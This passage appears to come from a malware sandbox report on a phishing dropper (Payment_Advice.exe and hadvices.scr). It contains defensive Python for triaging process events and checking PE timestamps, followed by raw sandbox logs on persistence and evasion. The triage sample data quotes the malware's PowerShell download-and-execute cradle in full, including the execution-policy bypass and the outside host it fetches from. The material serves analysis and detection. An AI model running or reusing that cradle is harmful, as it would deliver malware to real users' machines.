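# legitimate software seldom executes from. Both lists are this example's choices.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DROP_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\")
EXEC_EXTS = (".exe", ".scr", ".dll", ".bat", ".vbs", ".js", ".ps1")

# The report's line shape: "Source: <parent>Process created: <child> <cmdline>"
EVENT_RE = re.compile(r"^Source:\s*(?P<parent>.+?)\s*Process created:\s*(?P<child>\S+)\s*(?P<cmdline>.*)$")
FETCH_RE = re.compile(r"Invoke-WebRequest\s+-Uri\s+'(?P<url>[^']+)'\s+-OutFile\s+'(?P<out>[^']+)'", re.I)
START_RE = re.compile(r"Start-Process\s+'(?P<path>[^']+)'", re.I)

# Constructed sample input: the two process creations listed in this section
# and one benign control line that should not fire.
SAMPLE_EVENTS = [
    r'''Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"''',
    r'''Source: C:\Windows\Temp\hadvices.scr Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"''',
    r'''Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command "Get-Date"''',
]


def _name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def _in_drop_dir(path):
    """True when the path is an executable type inside one of the drop directories."""
    p = path.lower()
    return p.startswith(DROP_DIRS) and p.endswith(EXEC_EXTS)


def parse_event(line):
    """Split one report line into parent, child and command line; None if it is not a process creation."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return {"parent": m["parent"].strip(), "child": m["child"], "cmdline": m["cmdline"]}


def triage_event(ev):
    """Score one process creation and extract the URLs and dropped paths it references."""
    reasons, urls, drops = [], [], []
    cmd = ev["cmdline"]
    if _name(ev["parent"]) in SCRIPT_HOSTS and _name(ev["child"]) == "powershell.exe":
        reasons.append("script host spawned powershell.exe")
    if "-executionpolicy bypass" in cmd.lower():
        reasons.append("execution policy bypassed on the command line")
    for m in FETCH_RE.finditer(cmd):
        urls.append(m["url"])
        drops.append(m["out"])
        if _in_drop_dir(m["out"]):
            reasons.append("executable written to drop directory: " + m["out"])
    # The cradle signature: a file downloaded and launched by the same command.
    launched = {m["path"].lower() for m in START_RE.finditer(cmd)}
    if launched & {d.lower() for d in drops}:
        reasons.append("downloaded file launched by the same command (download-and-execute cradle)")
    if _name(ev["child"]).endswith(".scr") and _in_drop_dir(ev["child"]):
        reasons.append("screensaver extension executed from drop directory")
    severity = "high" if len(reasons) >= 3 else "medium" if reasons else "info"
    return {"parent": ev["parent"], "child": ev["child"], "severity": severity,
            "reasons": reasons, "urls": urls, "drops": drops}


def triage(lines):
    """Parse and score every process-creation line; lines of other kinds are skipped."""
    return [triage_event(ev) for ev in map(parse_event, lines) if ev]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["child"])
        for reason in finding["reasons"]:
            print("   -", reason)
        for url in finding["urls"]:
            print("   url:", url)
```

Run on the constructed lines, the cradle scores high on four counts (script-host parent, policy bypass, executable dropped to C:\Windows\Temp, download then launch in one command) and yields both URLs as IOCs; the hadvices.scr self-launch scores medium on the .scr-from-Temp rule alone; the explorer-spawned Get-Date line scores info. The parser also accepts the fused "wscript.exeProcess created:" form the extracted report uses.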
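The link timestamp 0xDD330B0C (decoding to 7 August 2087) flagged in the Data Obfuscation block and the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR data directory noted earlier are both read straight from the PE header. The Python below is an added example, not code from the report or from the sample, that parses those two fields and classifies the timestamp. It builds in one caveat a triage analyst should apply before calling a future timestamp "tampered": Roslyn deterministic builds replace the link time with a hash of the compilation, and those values commonly have the high bit set, which decodes to a date after 2038, so on a .NET image (CLR header present) a far-future value is weaker evidence than the same value on a native binary. The header bytes produced by build_test_header are constructed for the example (a minimal PE32 header, not a loadable image); the verdict labels and the 1995 lower bound are the example's own choices.

```python
import struct
import time
from datetime import datetime, timezone

# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
FILE_HEADER_FMT = "<HHIIIHH"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
COM_DESCRIPTOR_INDEX = 14        # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header)
OLDEST_PLAUSIBLE_YEAR = 1995     # this example's own lower bound for a genuine link time


def parse_pe_header(data):
    """Return machine, raw link timestamp and whether a CLR header directory is present."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, _, timestamp, _, _, _, _ = struct.unpack_from(FILE_HEADER_FMT, data, fh)
    opt = fh + struct.calcsize(FILE_HEADER_FMT)
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%X" % magic)
    # Data directories begin at +96 (PE32) or +112 (PE32+); NumberOfRvaAndSizes sits just before them.
    dd_off = opt + (96 if magic == PE32_MAGIC else 112)
    n_dirs = struct.unpack_from("<I", data, dd_off - 4)[0]
    is_dotnet = False
    if n_dirs > COM_DESCRIPTOR_INDEX:
        rva, size = struct.unpack_from("<II", data, dd_off + COM_DESCRIPTOR_INDEX * 8)
        is_dotnet = rva != 0 and size != 0
    return {"machine": machine, "timestamp": timestamp, "is_dotnet": is_dotnet}


def timestamp_to_iso(ts):
    """Render a raw PE timestamp as an ISO-8601 UTC string."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


def classify_timestamp(ts, is_dotnet, now_ts=None):
    """Verdicts (example's own labels): stripped, future-deterministic-hash, future, too-old, plausible."""
    now_ts = int(time.time()) if now_ts is None else now_ts
    if ts in (0, 0xFFFFFFFF):
        return "stripped"
    if ts > now_ts:
        # Deterministic .NET builds store a content hash here; the high bit is the usual tell.
        if is_dotnet and ts & 0x80000000:
            return "future-deterministic-hash"
        return "future"
    if datetime.fromtimestamp(ts, tz=timezone.utc).year < OLDEST_PLAUSIBLE_YEAR:
        return "too-old"
    return "plausible"


def build_test_header(timestamp, dotnet=True):
    """Constructed minimal PE32 header for exercising the parser; not a loadable image."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    file_hdr = struct.pack(FILE_HEADER_FMT, 0x14C, 3, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                                   # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + COM_DESCRIPTOR_INDEX * 8, 0x2008, 0x48)  # CLR header RVA/size
    return dos + b"PE\0\0" + file_hdr + bytes(opt)


if __name__ == "__main__":
    info = parse_pe_header(build_test_header(0xDD330B0C))
    print(hex(info["timestamp"]), timestamp_to_iso(info["timestamp"]),
          "dotnet" if info["is_dotnet"] else "native",
          classify_timestamp(info["timestamp"], info["is_dotnet"]))
```

On a real file, replace build_test_header with the first few kilobytes of the sample and pair the verdict with the other evidence in this report (the RunPE PDB path, the in-memory Assembly.Load, the download cradle) rather than treating the 2087 date on its own as proof of tampering.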

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\hadvices.scrJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\hadvices.scrJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\hadvices.scrJump to dropped file
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: Payment_Advice.exe PID: 1228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: 1450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: 3010000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: 2F50000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 1550000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 2DB0000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 4DB0000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 1770000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 3130000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 5130000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Payment_Advice.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 922337203685477
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 600000
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599889
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599773
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599664
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599554
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599324
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 598007
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597881
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597766
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597613
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597444
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597304
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597189
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597080
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596952
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596840
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596715
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596600
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596484
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596362
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596250
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596138
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596012
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595898
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595787
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595643
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595531
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595409
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595284
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595079
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593976
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593862
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593706
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593596
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593456
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593303
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 589105
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\Desktop\Payment_Advice.exeWindow / User API: threadDelayed 466
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6693
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3192
            Source: C:\Windows\Temp\hadvices.scrWindow / User API: threadDelayed 2822
            Source: C:\Windows\Temp\hadvices.scrWindow / User API: threadDelayed 6968
            Source: C:\Users\user\Desktop\Payment_Advice.exe TID: 6428Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\Payment_Advice.exe TID: 1664Thread sleep count: 466 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7400Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8268Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep count: 37 > 30
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -34126476536362649s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599889s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8520Thread sleep count: 2822 > 30
            Source: C:\Windows\Temp\hadvices.scr TID: 8520Thread sleep count: 6968 > 30
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599773s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599664s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599554s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599440s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599324s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -598007s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597881s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597766s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597613s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597444s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597304s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597189s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597080s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596952s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596840s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596715s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596600s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596484s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596362s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596250s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596138s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596012s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595898s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595787s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595643s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595531s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595409s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595284s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595079s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593976s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593862s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593706s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593596s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593456s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593303s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593190s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593065s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592940s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592815s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592690s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592565s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592440s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592315s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592190s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592065s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591940s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591815s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591690s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591565s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591440s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591315s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591190s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -589105s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\Payment_Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 922337203685477
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 922337203685477
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 600000
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599889
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599773
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599664
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599554
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599324
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 598007
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597881
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597766
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597613
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597444
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597304
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597189
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597080
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596952
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596840
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596715
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596600
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596484
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596362
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596250
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596138
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596012
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595898
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595787
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595643
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595531
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595409
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595284
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595079
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593976
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593862
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593706
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593596
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593456
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593303
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 589105
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
            Source: hadvices.scr, 00000019.00000002.2450723926.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
